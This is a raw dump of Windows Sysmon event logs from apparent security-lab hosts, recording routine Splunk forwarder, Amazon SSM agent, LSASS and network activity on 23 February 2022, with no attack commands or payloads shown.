Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=66589FF348A98C39E581A45476034255,SHA256=536354FB44754C2522CC3AC155F64F7D47871C855C8BAED8AAD3DD1A16C54F8E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000222399Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:22:45.606{4F8D34B0-F11D-6215-1D00-000000003902}1876NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-04ffbe17aee3fbf0d\channels\health\respondent-20220223083233-165MD5=7840F8D654EED3E7C6FA395A9E23FA56,SHA256=FC4C38DACEF1698268BE802A03907A00216EAC67FA531AF20528DD4173FB9624,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000222398Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:22:45.399{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1687A086E2F8B0011AC299BA61A1F8A5,SHA256=00F7AEB49B507A696F5D533C547ADE6ED50BDE7FF0B4B12064B8792C6AE9297D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000298580Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:22:45.652{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=E4094F41B8235F9D23D3897FA6AFDC3E,SHA256=7EA7DE999850FA7D809CCFEBA2DC1B8095A1D41CB390CFD9FD5A3378C1E78C85,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000298579Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:22:45.652{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=68F8392B0308F434FD11275CE0ABC53D,SHA256=CB614BF428CCF8F5E0856FBD9CFD8083B14F458C87324B63D021A001AFE6BBB5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000222397Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:22:45.196{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=F3F0B8C7864DC9AA8F3AF2D26816C37B,SHA256=273822666B2E9FB3F0F68E2584C972250CA3F12CD136C65126127421BBCD697F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000222396Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:22:45.196{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=87732A742301850BD5190E7884BB431F,SHA256=E2BE675EA30F9E322C103DA6EBF865722D30C6750F070E21DD378C51AAEDA245,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000222415Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:22:46.680{4F8D34B0-F11D-6215-2300-000000003902}2036NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=C796F5788518CF0F57AB5C87207C5D14,SHA256=0CE7095FECB35749AB15D15586D728EDDAEC94009FC3FB4FCEDC790B064FF951,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000222414Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:22:46.633{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-1906-6216-3B05-000000003902}3092C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222413Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:22:46.633{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222412Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:22:46.633{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222411Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:22:46.633{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222410Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:22:46.633{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222409Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:22:46.633{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222408Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:22:46.633{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222407Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:22:46.633{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222406Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:22:46.633{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222405Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:22:46.633{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222404Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:22:46.633{4F8D34B0-F11B-6215-0500-000000003902}412532C:\Windows\system32\csrss.exe{4F8D34B0-1906-6216-3B05-000000003902}3092C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000222403Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:22:46.633{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-1906-6216-3B05-000000003902}3092C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000222402Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:22:46.634{4F8D34B0-1906-6216-3B05-000000003902}3092C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000222401Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:22:46.605{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=599235897D370E4DEED329472EEBEBB7,SHA256=8996DE51B8306B1B50C063DF85F1FE36F875FFE7339257E3B51D7759DCE85421,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000222400Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:22:46.604{4F8D34B0-F11D-6215-1D00-000000003902}1876NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-04ffbe17aee3fbf0d\channels\health\surveyor-20220223083230-166MD5=97EF2A570B75C4F95FC69B0D09A2E2A2,SHA256=11396EA313B0ED7E3228C4FA92ABE9D836DB8F416A7A8A28ACC77133025082E7,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000298592Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:22:45.336{C8EA50B7-F11D-6215-0B00-000000003802}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:dc9d:9662:799b:139cwin-dc-tcontreras-attack-range-173.attackrange.local49542-truefe80:0:0:0:dc9d:9662:799b:139cwin-dc-tcontreras-attack-range-173.attackrange.local389ldap 354300x8000000000000000298591Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:22:45.336{C8EA50B7-F11F-6215-1000-000000003802}364C:\Windows\System32\svchost.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:dc9d:9662:799b:139cwin-dc-tcontreras-attack-range-173.attackrange.local49542-truefe80:0:0:0:dc9d:9662:799b:139cwin-dc-tcontreras-attack-range-173.attackrange.local389ldap 23542300x8000000000000000298590Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:22:46.733{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=242A95CB69D7025585A4DB60DA2D66A6,SHA256=C552159E81B37E7F3968466F355D48D5EFA519184666619FD54E8133417C44B0,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000298589Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:22:44.102{C8EA50B7-F118-6215-0100-000000003802}4SystemNT AUTHORITY\SYSTEMtcpfalsefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49541-false10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local445microsoft-ds 354300x8000000000000000298588Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:22:44.102{C8EA50B7-F118-6215-0100-000000003802}4SystemNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49541-false10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local445microsoft-ds 10341000x8000000000000000298587Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:22:46.036{C8EA50B7-F11D-6215-0B00-000000003802}6286484C:\Windows\system32\lsass.exe{C8EA50B7-F11F-6215-1000-000000003802}364C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000298586Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:22:46.036{C8EA50B7-F11F-6215-1000-000000003802}364NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Windows\security\audit\audit.csvMD5=DDF0C2622258DF5AE8CB415CDCD08019,SHA256=8D6A5261E229A9B08573C28F549FA17C3A3F874B54F56CF5CC5C177B05CC6774,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000298585Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:22:45.989{C8EA50B7-F11D-6215-0B00-000000003802}6281356C:\Windows\system32\lsass.exe{C8EA50B7-F118-6215-0100-000000003802}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\kerberos.DLL+97022|C:\Windows\system32\kerberos.DLL+794d4|C:\Windows\system32\kerberos.DLL+1443f|C:\Windows\system32\lsasrv.dll+2f1f1|C:\Windows\system32\lsasrv.dll+2d0d6|C:\Windows\system32\lsasrv.dll+32919|C:\Windows\system32\lsasrv.dll+30267|C:\Windows\system32\lsasrv.dll+2f1f1|C:\Windows\system32\lsasrv.dll+1752d|C:\Windows\SYSTEM32\SspiSrv.dll+1a96|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e 23542300x8000000000000000222431Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:22:47.978{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=36BD1C48788F26E87C71118A599A2F58,SHA256=572E620291056356739E89180253FD69445E4F49C9436CA901FD18760EDB65C0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000298598Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:22:47.748{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=973FB858994DD5016F0856282878D61F,SHA256=B708459359152B643DF38B9D9C959EB71280F654FE22141AC1D7F5973E9C5FE2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000222430Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:22:47.634{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=F3F0B8C7864DC9AA8F3AF2D26816C37B,SHA256=273822666B2E9FB3F0F68E2584C972250CA3F12CD136C65126127421BBCD697F,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000222429Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:22:47.384{4F8D34B0-1907-6216-3C05-000000003902}40083668C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222428Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:22:47.150{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-1907-6216-3C05-000000003902}4008C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222427Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 